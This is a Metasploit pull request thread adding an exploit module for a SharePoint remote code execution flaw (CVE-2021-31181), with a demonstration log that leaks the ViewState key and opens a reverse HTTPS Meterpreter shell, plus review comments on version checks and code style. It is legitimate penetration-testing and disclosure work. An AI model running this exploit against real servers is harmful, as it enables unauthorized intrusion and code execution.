Add Exploit For CVE-2021-31181 (SharePoint RCE)
rapid7/metasploit-framework pull request #15314
Opened 2021-06-08 19:31 UTC by zeroSteiner

This adds an exploit for CVE-2021-31181 which is an authenticated RCE within SharePoint. The vulnerability is a discrepancy in how a control is validated allowing it to be bypassed and an unsafe control used. As outlined in the [original ZDI disclosure](https://www.zerodayinitiative.com/blog/2021/6/1/cve-2021-31181-microsoft-sharepoint-webpart-interpretation-conflict-remote-code-execution-vulnerability), this module uses the `System.Web.UI.WebControls.XmlDataSource` control to leak the ViewState validation key. After that, a malicious ViewState is issued with a serialized .NET gadget chain that will execute an OS command.

Other than the means by which the ViewState validation key is obtained, this module is very similar to the `sharepoint_ssi_viewstate` module. This also adds a brand new SharePoint mixin which some functionality to execute code via a malicious ViewState and perform some basic enumeration functions.

The user needs to have the `SPBasePermissions.ManageLists` permission on the targeted site, but by default users can make their own site where that permission will be present. This action isn't taken by the module, and must be done manually by the user. This is all included in the module docs for the `HttpUsername` option.

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/windows/http/sharepoint_unsafe_control`
- [ ] Set the `RHOST`, `HttpUsername` and `HttpPassword` options as necessary
- [ ] Set the `PAYLOAD` and related options
- [ ] Run `exploit` and get a shell

## Demonstration

```
msf6 exploit(windows/http/sharepoint_unsafe_control) > set RHOSTS 192.168.159.46
RHOSTS => 192.168.159.46
msf6 exploit(windows/http/sharepoint_unsafe_control) > set VHOST shrpnt2019
VHOST => shrpnt2019
msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpUsername aliddle
HttpUsername => aliddle
msf6 exploit(windows/http/sharepoint_unsafe_control) > set HttpPassword Password1
HttpPassword => Password1
msf6 exploit(windows/http/sharepoint_unsafe_control) > check
[*] 192.168.159.46:80 - The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
msf6 exploit(windows/http/sharepoint_unsafe_control) > exploit

[*] Started HTTPS reverse handler on https://192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
[*] Leaking the ViewState validation key...
[+] ViewState validation key: F894731BF335C2DAB04D70773B5F6BE55EE2C4052B671EE3C6785497A3D29A94
[*] Executing PowerShell Stager for windows/x64/meterpreter/reverse_https
[*] https://192.168.159.128:8443 handling request from 192.168.159.46; (UUID: a5re3jes) Staging x64 payload (201308 bytes) ...
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 127.0.0.1) at 2021-06-08 15:08:59 -0400

meterpreter > getuid
Server username: SHRPNT\SharePoint
meterpreter > sysinfo
Computer        : SHRPNT2019
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : SHRPNT
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > 
```

2021-06-10 13:47 UTC, bwatters-r7 commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +    unless username && password
This prevents people from using the module with only a cookie and no username/password

2021-06-10 15:31 UTC, zeroSteiner commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +    unless username && password
Resolved in edee95b.

2021-06-11 23:22 UTC, gwillcox-r7 requested changes
Overall a very well formed exploit, however there are a few points that I think would be good to go over and review. Most of these are small changes however there 1-2 bigger points that may require a little bit more work. Let me know if you have any questions.

2021-06-11 23:22 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +      [Rex::Version.new('16.0.0.10000'), Rex::Version.new('16.0.0.10373')] # SharePoint 2019
This doesn't make any sense. Your version numbers don't seem to match up with any of the version numbers listed on either of these sites.

If anything this is what I see as the proper version numbers given the information from Microsoft's site:

```suggestion
      [Rex::Version.new('15.0.0.0'), Rex::Version.new('15.0.5345.1000')], # SharePoint 2013
      [Rex::Version.new('16.0.0.0'), Rex::Version.new('16.0.5161.1000')], # SharePoint 2016
      [Rex::Version.new('16.0.10000.0'), Rex::Version.new('16.0.10374.20000')] # SharePoint 2019
```

2021-06-11 23:22 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +    build = sharepoint_get_version('cookie' => cookie)
I'm going to be that guy and just ask, is it necessary to pass the cookie in here when this is meant to be an unauthenticated check as described in your documentation? This seems to somewhat conflict with what you described there if one does indeed provide a cookie value.

Otherwise I have no issues with this but just thought it might be good to make the documentation reflect the code behavior a little closer.

2021-06-11 23:22 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +    WEBPART
This is pretty confusing. Shouldn't we not mix options to a `Nokogiri::XML` call with what appears to be XML that is being saved to a variable called `webpart`? The code is very hard to read as a result. Same comments apply to the other code below which uses a similar pattern for the `envelope` variable.

2021-06-11 23:22 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +      fail_with(Failure::NotFound, "Failed to retrieve #{normalize_uri(target_uri.path, '_vti_bin', 'WebPartPages.asmx')}")
The word `retrieve` here is a little odd to me. Technically its that you couldn't find the page on the server, as you aren't downloading the page or similar. Given this is an information leak one might also mistakenly assume from the output that this is a page we need to leak to proceed when in reality this is not the case. Just some thoughts though.

2021-06-11 23:22 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +    fail_with(Failure::NotFound, 'Failed to extract the ViewState validation key') if web_part_pages.root.nil?
Given that this whole section deals with the response, it would be a good idea to assume that certain elements might not exist vs trying to retrieve them without validation. In particular the server could return a non-XML response or `web_part_pages` might not contain a `.root` element. Might be good to just do some double checking in this area as I feel this may be trusting the server sends a properly formed response too much.

2021-06-14 12:59 UTC, zeroSteiner commented on lib/msf/core/exploit/remote/http/sharepoint.rb
> +            return nil unless /^(?<build>[\d.]+)/ =~ res&.headers['MicrosoftSharePointTeamServices']
It was removed because it didn't match a server I was using for testing which did not end with a `:`.

2021-06-14 13:01 UTC, zeroSteiner commented on lib/msf/core/exploit/remote/http/sharepoint.rb
> +          def sharepoint_execute_command_via_viewstate(cmd, validation_key, http_request_opts = {})
That's because these functions don't require an authentication cookie. The cookie is optional, a user or developer can specify it if they want. The idea is to propagate and keep the changes introduced by #14361.

2021-06-14 13:02 UTC, zeroSteiner commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +    build = sharepoint_get_version('cookie' => cookie)
See the other comment regarding the cookie.

2021-06-14 13:05 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
> +The `EditingPageParser.VerifyControlOnSafeList` method fails to properly validate user supplied data. This can be
I don't have the file name. That's just a detail from the original disclosure.

2021-06-14 13:07 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
> +leveraged by an attacker to leak sensitive information in rendered-preview content. This module will leak the ViewState
The sensitive information is contained within the rendered-preview content.

2021-06-14 13:09 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
> +Set this to the SharePoint password.
There is no "password" for the entire SharePoint site that I'm aware of. Everything is done through accounts. I think it's clear enough that this corresponds to the `HttpUsername` option which is documented next to it and provides a little more clarity. This is also the exact wording that other SharePoint modules use to describe the same option.

2021-06-14 13:09 UTC, zeroSteiner commented on documentation/modules/exploit/windows/http/sharepoint_unsafe_control.md
> +msf6 exploit(windows/http/sharepoint_unsafe_control) > set RHOSTS 192.168.159.46
The module is already loaded, you can see it in the prompt.

2021-06-14 13:14 UTC, zeroSteiner commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +        'DefaultTarget' => 2,
I think the powershell option is acceptable here because it's an optional target, the module is not fully-dependent on it to operate. If the user does not want to use powershell or can't use powershell, they have other options by simply changing the target and the module will still work. I kept this as the default target, following the precedence that was set in the previous module. If powershell is available, this target will not write anything to disk or need to execute multiple commands making faster and cleaner than the command stager.

2021-06-14 13:31 UTC, zeroSteiner commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +      [Rex::Version.new('16.0.0.10000'), Rex::Version.new('16.0.0.10373')] # SharePoint 2019
The version number that is pulled out of the header is not the exact same as what's published on that page from Microsoft. You'll notice in the output from the exploit:
```
[+] The target appears to be vulnerable. SharePoint 16.0.0.10337 is a vulnerable build.
```

This was from a SharePoint 2019 instance running on Server 2016. This suggestion would break the check due to how there's an additional `.0` in the value returned in the header. Additionally since this was patched in May of 2021, the last vulnerable version was the patch from April 2021.

* `16.0.10373.20000` SharePoint 2019
* `16.0.5149.1000` SharePoint 2016
* `15.0.5337.1000` SharePoint 2013

The values in the original code are correct because of how Ruby's `#between?` method is inclusive. For example:

```
2.between?(1, 2)
```

2021-06-14 13:42 UTC, zeroSteiner commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +    WEBPART
This is how it's done elsewhere in the framework. Using `Nokogiri` allows the whitespace to be removed in the final output, while being kept in the module's definition so it's easier to ready.  The squiggly heredoc syntax was originally suggested [here](https://github.com/rapid7/metasploit-framework/pull/13852#pullrequestreview-450607921) where it was then refined to add the call to Nokogriri to remove the whitespace and get the best of both worlds.

I'm open to suggestions on better ways to make it readable.

2021-06-14 14:05 UTC, zeroSteiner commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +  end
It's defined in the module class and then used by the framework. See [`core/module.rb`](https://github.com/rapid7/metasploit-framework/blob/87386a57dd0f8da14adbf3a41159df2bfc099f4f/lib/msf/core/module.rb#L323-L341).

2021-06-14 15:38 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +      [Rex::Version.new('16.0.0.10000'), Rex::Version.new('16.0.0.10373')] # SharePoint 2019
"This suggestion would break the check due to how there's an additional .0 in the value returned in the header." <- This is what I was trying to identify, as otherwise on first glance it would appear this would need to match the values on the Microsoft page you linked to.

2021-06-14 15:42 UTC, gwillcox-r7 commented on modules/exploits/windows/http/sharepoint_unsafe_control.rb
> +    WEBPART
I think the main confusion comes from having data intermingled with code here. If you were to define a separate variable and then use there heredoc to save the form data there, and then pass that in as a parameter, it would make it a lot more readable. 

When I first see this code my eyes think that the `nil` values are part of the XML but then I have to do a double take and realize:

1. The code is not part of a string interpretation
2. Where is the calling function? Oh its Nokogiri::XML()? Well then were is the data that is being passed to it?
3. Spend a few minutes working out where the actual data is that is being passed to this function.

2021-06-14 15:46 UTC, gwillcox-r7 approved these changes

2021-06-16 15:37 UTC, gwillcox-r7 commented
Confirmed this runs as expected and got me a shell, so will be merging this in now. Nice work @zeroSteiner and @wvu-r7 🥳

2021-06-16 15:40 UTC, merged

2021-06-16 15:44 UTC, gwillcox-r7 commented
# Release Notes
A new exploit for CVE-2021-31181 has been added, which exploits a RCE in SharePoint that was patched in May 2021. Successful exploitation requires the attacker to have login credentials for a SharePoint user who has `SPBasePermissions.ManageLists` permissions on any SharePoint site, and grants the attacker remote code execution as the user running the SharePoint server.